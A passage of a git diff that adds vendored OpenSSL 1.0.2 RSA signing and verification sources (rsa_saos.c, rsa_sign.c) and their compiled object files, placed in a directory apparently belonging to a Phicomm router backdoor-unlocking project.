zPdLuU^KFjv`F)4ue113Mgdn&qK9Acd$A-^iJIDEXdpZ7Puwm;T<v3rTI>-4u<|)VZ
z@OgZd)92&=Rt<iW<9r_f!ExRX`zyuQd|tNFdkr~XpBawx`F)M!d>;K^kAnN6C18!m
zt!J6D`}kM|XZP{1D>%D%NiaQ~(4s@oYAL%NWxZ5<JQ~#EQyK}v%@!rWp)_2_sR<mQ
zx)2oDkOX5Bi9|dJs>um09)wT1UDj<z$A^-7a56P98Bb}`V1th1qv}X1nuybd{hy5=
z?D0w{f5F%e+wF$@lE#+~xi1KtVD2zi?e=i>c?OFc<TO189_Zsd?8^sh1m&ynLr&EY
zS#rN(UdHM5#fD@j^w8)3YA=8-`rHjaUfBGVUtVl}*0zHY_W2q^KW-XOwqIl@m17wg
z+PC0KPJGmU2gk6>=4I`7IL50!S(#A!lG!ocD0J}LSFXRE+WVOzZ7bJ54IF(|+8?C$
z*Z+&X2JfrY&q4ZObCB9&{a`NG{H%Ve&5b6lxG9iES{M&OAAgnh_{CjWJAg<ZO?<o}
VU=>5_KfRiLfv!J;&N!*G|2OaAQw9J4

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_saos.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_saos.c
new file mode 100644
index 0000000..e400236
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_saos.c
@@ -0,0 +1,148 @@
+/* crypto/rsa/rsa_saos.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int RSA_sign_ASN1_OCTET_STRING(int type,
+                               const unsigned char *m, unsigned int m_len,
+                               unsigned char *sigret, unsigned int *siglen,
+                               RSA *rsa)
+{
+    ASN1_OCTET_STRING sig;
+    int i, j, ret = 1;
+    unsigned char *p, *s;
+
+    sig.type = V_ASN1_OCTET_STRING;
+    sig.length = m_len;
+    sig.data = (unsigned char *)m;
+
+    i = i2d_ASN1_OCTET_STRING(&sig, NULL);
+    j = RSA_size(rsa);
+    if (i > (j - RSA_PKCS1_PADDING_SIZE)) {
+        RSAerr(RSA_F_RSA_SIGN_ASN1_OCTET_STRING,
+               RSA_R_DIGEST_TOO_BIG_FOR_RSA_KEY);
+        return (0);
+    }
+    s = (unsigned char *)OPENSSL_malloc((unsigned int)j + 1);
+    if (s == NULL) {
+        RSAerr(RSA_F_RSA_SIGN_ASN1_OCTET_STRING, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    p = s;
+    i2d_ASN1_OCTET_STRING(&sig, &p);
+    i = RSA_private_encrypt(i, s, sigret, rsa, RSA_PKCS1_PADDING);
+    if (i <= 0)
+        ret = 0;
+    else
+        *siglen = i;
+
+    OPENSSL_cleanse(s, (unsigned int)j + 1);
+    OPENSSL_free(s);
+    return (ret);
+}
+
+int RSA_verify_ASN1_OCTET_STRING(int dtype,
+                                 const unsigned char *m,
+                                 unsigned int m_len, unsigned char *sigbuf,
+                                 unsigned int siglen, RSA *rsa)
+{
+    int i, ret = 0;
+    unsigned char *s;
+    const unsigned char *p;
+    ASN1_OCTET_STRING *sig = NULL;
+
+    if (siglen != (unsigned int)RSA_size(rsa)) {
+        RSAerr(RSA_F_RSA_VERIFY_ASN1_OCTET_STRING,
+               RSA_R_WRONG_SIGNATURE_LENGTH);
+        return (0);
+    }
+
+    s = (unsigned char *)OPENSSL_malloc((unsigned int)siglen);
+    if (s == NULL) {
+        RSAerr(RSA_F_RSA_VERIFY_ASN1_OCTET_STRING, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    i = RSA_public_decrypt((int)siglen, sigbuf, s, rsa, RSA_PKCS1_PADDING);
+
+    if (i <= 0)
+        goto err;
+
+    p = s;
+    sig = d2i_ASN1_OCTET_STRING(NULL, &p, (long)i);
+    if (sig == NULL)
+        goto err;
+
+    if (((unsigned int)sig->length != m_len) ||
+        (memcmp(m, sig->data, m_len) != 0)) {
+        RSAerr(RSA_F_RSA_VERIFY_ASN1_OCTET_STRING, RSA_R_BAD_SIGNATURE);
+    } else
+        ret = 1;
+ err:
+    if (sig != NULL)
+        M_ASN1_OCTET_STRING_free(sig);
+    if (s != NULL) {
+        OPENSSL_cleanse(s, (unsigned int)siglen);
+        OPENSSL_free(s);
+    }
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_saos.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_saos.o
new file mode 100644
index 0000000000000000000000000000000000000000..e457c023220a89d0f32412dc7fa5ed2235b3fa5b
GIT binary patch
literal 3440
zcmbuBZ)hAv6u{?lNqcS6ZLDIiw3HLBa%#KWrWPA1lD*s|8(5Q&yYvrQm(69<9KC<;
z?bW8%RwxyQ7_FcBwfbEU@q+}d!L}5^+I|rPL9K|kjcux81rh6evoq;r?+!#C%+1Vi
z-k*7Ic6RSX#_Vqkg@}+4d4}Ad2};PFRrkleY}iW_vX=a|Zp)wgUVYCX{X!qpbI;Px
z$Fj!BpAD0y;}LWASUhIZdlSY?`_=?l89;Yw^9J?e3GFV;#bcM!@pwC|Tt}ZK{fS;=
zquG(WJvUEuX0&<jv$-lPEhJ|5h359a$e7)Uy7XJ7I7lxVr{?Qhd`%q|&K-uIPta#Z
z`+?~!3>mXtJPI4Z_)#9}n*JdsN*7J~t4VJQ<x}&=*BUcsJfeTZmP008q~CCxMb;ZL
zki~?t!_Ud<@Zre|Mw)*2+yVW0{eb?0Zk_i_W6~>w^a>W}E)<A<$!nCR=b=o|WtE9&
z^UPJxS02y&CD`D?R(fgf2n=}Qel$PrN2Ih-g{OUs>D)LC#81+s*9`ipN&n_mgCxg{
z{8fYgs6kD(#hLyfy#S^3cBgw1^^L|%HIk+`P5OuaG1h@;!0Jvv;uN5B4G|YMWVBnx
zQoUfr%obL|!TO``v38LrwTq_db*Xl4&9-WGrKaWy8R+YKI+hq4ua~`gtVi9UCbw%(
z)!9@#-knsFPd?^j*b~8X?}F9=ZD44Ov=K6oEDR0hA-^M`qoX8rq${+kb7kZ-BxnHN
z%-1$y!u?9un{6p2`bIdT#Ae%5O5*j7w32*ng|6&6xiYQ18fyDp*#$&b5-BAHnkl6#
zr9{9KeNAy+yO(?!OTIG8eGMoh;nkrQzPOu)4&AnsU+y(500=j|!N^4wmRp5c)s{1y
zg;^Dw@s*8`>0|bd5+>5igD-co9#5%J!em7Qd;rLLDKB<Lz_vld^A1W1Kr_Ct1-D!9
zN(=r<3;tFM{&oxgZVP@6IOZ$zWX}<>uUqKfZo%8(L1|WpH7z)iZk}rPCCO-3w`zrh
zWlPTvY1VLGE|asexzWL)0b&i9!ztaghWq=oKy!M^%vhw*J<&whcXQMseWUwFa>G{1
zE*2|!k{KPfs&&tDT({z~SXH-h*!CRDDd*kksz-)LGDF#{Y2}NKU9K(JPr8mnEUV_(
z`9oHI>X0>Q7mCcmVaF{@PPf=XwLV@f<gE$EcRtZwXrfqhO8HWiu!Q|oEfx++Oa}1>
z1m7uZq5XBwmn=dM<O(#w>j**MJ;ZK-;KvyC_1D2z@Us%fa})dniOX>>OC0Zr(7!J6
z^%B1$@dqW|0nY;p?jPTg!q14r<-E$A2lJ{)`f^@pBrfOmzQiAv;$D*Y28rL0cvRx6
za3dhNf7yRj;&L5g5|``nxWqStFHr|w;&Odrpo4<TT!qbx?Dsww_n4@)>5^xUL+`nM
zKP5)4Q?ymjIpPs@!uD*Uj@N2Lbt^bQbxqZXny-{fP8n3n70*%O6Stk+0X{!iuB%nI
zQgvK!8cfllGX+ntU2^z_{%02hdpv^R8@d-5%3iq$Fz3g`*6?Q&G(4kTXtE^vC#8$q
zuYpCh6<-uQYm`T!ArF4Z&IID3E=n*yelO7Hf3?@R&u-{t5%F=~vWWPi?}bGiCuJoV
zzr*+cM1TuB(c}9^jAhl!|1$smV1%U(s$b<GCOd_(sK3B3!T{q3?eB2#o>1g{&>rta
zv-9uee-T7ou#Sj?y*U47u`$$HexOypk4|9dBWRC4gJ%zjbnypzbD+3^DZzJaGy5vv
L|I6r1lA!%R4?s{s

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_sign.c
new file mode 100644
index 0000000..bc91da2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_sign.c
@@ -0,0 +1,313 @@
+/* crypto/rsa/rsa_sign.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/rsa.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include "rsa_locl.h"
+
+/* Size of an SSL signature: MD5+SHA1 */
+#define SSL_SIG_LENGTH  36
+
+int RSA_sign(int type, const unsigned char *m, unsigned int m_len,
+             unsigned char *sigret, unsigned int *siglen, RSA *rsa)
+{
+    X509_SIG sig;
+    ASN1_TYPE parameter;
+    int i, j, ret = 1;
+    unsigned char *p, *tmps = NULL;
+    const unsigned char *s = NULL;
+    X509_ALGOR algor;
+    ASN1_OCTET_STRING digest;
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_RSA_SIGN, RSA_R_NON_FIPS_RSA_METHOD);
+        return 0;
+    }
+#endif
+    if ((rsa->flags & RSA_FLAG_SIGN_VER) && rsa->meth->rsa_sign) {
+        return rsa->meth->rsa_sign(type, m, m_len, sigret, siglen, rsa);
+    }
+    /* Special case: SSL signature, just check the length */
+    if (type == NID_md5_sha1) {
+        if (m_len != SSL_SIG_LENGTH) {
+            RSAerr(RSA_F_RSA_SIGN, RSA_R_INVALID_MESSAGE_LENGTH);
+            return (0);
+        }
+        i = SSL_SIG_LENGTH;
+        s = m;
+    } else {
+        sig.algor = &algor;
+        sig.algor->algorithm = OBJ_nid2obj(type);
+        if (sig.algor->algorithm == NULL) {
+            RSAerr(RSA_F_RSA_SIGN, RSA_R_UNKNOWN_ALGORITHM_TYPE);
+            return (0);
+        }
+        if (sig.algor->algorithm->length == 0) {
+            RSAerr(RSA_F_RSA_SIGN,
+                   RSA_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD);
+            return (0);
+        }
+        parameter.type = V_ASN1_NULL;
+        parameter.value.ptr = NULL;
+        sig.algor->parameter = &parameter;
+
+        sig.digest = &digest;
+        sig.digest->data = (unsigned char *)m; /* TMP UGLY CAST */
+        sig.digest->length = m_len;
+
+        i = i2d_X509_SIG(&sig, NULL);
+    }
+    j = RSA_size(rsa);
+    if (i > (j - RSA_PKCS1_PADDING_SIZE)) {
+        RSAerr(RSA_F_RSA_SIGN, RSA_R_DIGEST_TOO_BIG_FOR_RSA_KEY);
+        return (0);
+    }
+    if (type != NID_md5_sha1) {
+        tmps = (unsigned char *)OPENSSL_malloc((unsigned int)j + 1);
+        if (tmps == NULL) {
+            RSAerr(RSA_F_RSA_SIGN, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+        p = tmps;
+        i2d_X509_SIG(&sig, &p);
+        s = tmps;
+    }
+    i = RSA_private_encrypt(i, s, sigret, rsa, RSA_PKCS1_PADDING);
+    if (i <= 0)
+        ret = 0;
+    else
+        *siglen = i;
+
+    if (type != NID_md5_sha1) {
+        OPENSSL_cleanse(tmps, (unsigned int)j + 1);
+        OPENSSL_free(tmps);
+    }
+    return (ret);
+}
+
+/*
+ * Check DigestInfo structure does not contain extraneous data by reencoding
+ * using DER and checking encoding against original.
+ */
+static int rsa_check_digestinfo(X509_SIG *sig, const unsigned char *dinfo,
+                                int dinfolen)
+{
+    unsigned char *der = NULL;
+    int derlen;
+    int ret = 0;
+    derlen = i2d_X509_SIG(sig, &der);
+    if (derlen <= 0)
+        return 0;
+    if (derlen == dinfolen && !memcmp(dinfo, der, derlen))
+        ret = 1;
+    OPENSSL_cleanse(der, derlen);
+    OPENSSL_free(der);
+    return ret;
+}
+
+int int_rsa_verify(int dtype, const unsigned char *m,
+                   unsigned int m_len,
+                   unsigned char *rm, size_t *prm_len,
+                   const unsigned char *sigbuf, size_t siglen, RSA *rsa)
+{
+    int i, ret = 0, sigtype;
+    unsigned char *s;
+    X509_SIG *sig = NULL;
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode() && !(rsa->meth->flags & RSA_FLAG_FIPS_METHOD)
+        && !(rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)) {
+        RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_NON_FIPS_RSA_METHOD);
+        return 0;
+    }
+#endif
+
+    if (siglen != (unsigned int)RSA_size(rsa)) {
+        RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_WRONG_SIGNATURE_LENGTH);
+        return (0);
+    }
+
+    if ((dtype == NID_md5_sha1) && rm) {
+        i = RSA_public_decrypt((int)siglen,
+                               sigbuf, rm, rsa, RSA_PKCS1_PADDING);
+        if (i <= 0)
+            return 0;
+        *prm_len = i;
+        return 1;
+    }
+
+    s = (unsigned char *)OPENSSL_malloc((unsigned int)siglen);
+    if (s == NULL) {
+        RSAerr(RSA_F_INT_RSA_VERIFY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if ((dtype == NID_md5_sha1) && (m_len != SSL_SIG_LENGTH)) {
+        RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_INVALID_MESSAGE_LENGTH);
+        goto err;
+    }
+    i = RSA_public_decrypt((int)siglen, sigbuf, s, rsa, RSA_PKCS1_PADDING);
+
+    if (i <= 0)
+        goto err;
+    /*
+     * Oddball MDC2 case: signature can be OCTET STRING. check for correct
+     * tag and length octets.
+     */
+    if (dtype == NID_mdc2 && i == 18 && s[0] == 0x04 && s[1] == 0x10) {
+        if (rm) {
+            memcpy(rm, s + 2, 16);
+            *prm_len = 16;
+            ret = 1;
+        } else if (memcmp(m, s + 2, 16))
+            RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_BAD_SIGNATURE);
+        else
+            ret = 1;
+    }
+
+    /* Special case: SSL signature */
+    if (dtype == NID_md5_sha1) {
+        if ((i != SSL_SIG_LENGTH) || memcmp(s, m, SSL_SIG_LENGTH))
+            RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_BAD_SIGNATURE);
+        else
+            ret = 1;
+    } else {
+        const unsigned char *p = s;
+        sig = d2i_X509_SIG(NULL, &p, (long)i);
+
+        if (sig == NULL)
+            goto err;
+
+        /* Excess data can be used to create forgeries */
+        if (p != s + i || !rsa_check_digestinfo(sig, s, i)) {
+            RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_BAD_SIGNATURE);
+            goto err;
+        }
+
+        /*
+         * Parameters to the signature algorithm can also be used to create
+         * forgeries
+         */
+        if (sig->algor->parameter
+            && ASN1_TYPE_get(sig->algor->parameter) != V_ASN1_NULL) {
+            RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_BAD_SIGNATURE);
+            goto err;
+        }
+
+        sigtype = OBJ_obj2nid(sig->algor->algorithm);
+
+#ifdef RSA_DEBUG
+        /* put a backward compatibility flag in EAY */
+        fprintf(stderr, "in(%s) expect(%s)\n", OBJ_nid2ln(sigtype),
+                OBJ_nid2ln(dtype));
+#endif
+        if (sigtype != dtype) {
+            if (((dtype == NID_md5) &&
+                 (sigtype == NID_md5WithRSAEncryption)) ||
+                ((dtype == NID_md2) &&
+                 (sigtype == NID_md2WithRSAEncryption))) {
+                /* ok, we will let it through */
+#if !defined(OPENSSL_NO_STDIO) && !defined(OPENSSL_SYS_WIN16)
+                fprintf(stderr,
+                        "signature has problems, re-make with post SSLeay045\n");
+#endif
+            } else {
+                RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_ALGORITHM_MISMATCH);
+                goto err;
+            }
+        }
+        if (rm) {
+            const EVP_MD *md;
+            md = EVP_get_digestbynid(dtype);
+            if (md && (EVP_MD_size(md) != sig->digest->length))
+                RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_INVALID_DIGEST_LENGTH);
+            else {
+                memcpy(rm, sig->digest->data, sig->digest->length);
+                *prm_len = sig->digest->length;
+                ret = 1;
+            }
+        } else if (((unsigned int)sig->digest->length != m_len) ||
+                   (memcmp(m, sig->digest->data, m_len) != 0)) {
+            RSAerr(RSA_F_INT_RSA_VERIFY, RSA_R_BAD_SIGNATURE);
+        } else
+            ret = 1;
+    }
+ err:
+    if (sig != NULL)
+        X509_SIG_free(sig);
+    if (s != NULL) {
+        OPENSSL_cleanse(s, (unsigned int)siglen);
+        OPENSSL_free(s);
+    }
+    return (ret);
+}
+
+int RSA_verify(int dtype, const unsigned char *m, unsigned int m_len,
+               const unsigned char *sigbuf, unsigned int siglen, RSA *rsa)
+{
+
+    if ((rsa->flags & RSA_FLAG_SIGN_VER) && rsa->meth->rsa_verify) {
+        return rsa->meth->rsa_verify(dtype, m, m_len, sigbuf, siglen, rsa);
+    }
+
+    return int_rsa_verify(dtype, m, m_len, NULL, NULL, sigbuf, siglen, rsa);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_sign.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_sign.o
new file mode 100644
index 0000000000000000000000000000000000000000..34f7ab4afdf60822ebedc241517973432cbe52c6
GIT binary patch
literal 5320
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ssl.c
new file mode 100644
index 0000000..746e01f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_ssl.c
@@ -0,0 +1,149 @@
+/* crypto/rsa/rsa_ssl.c */
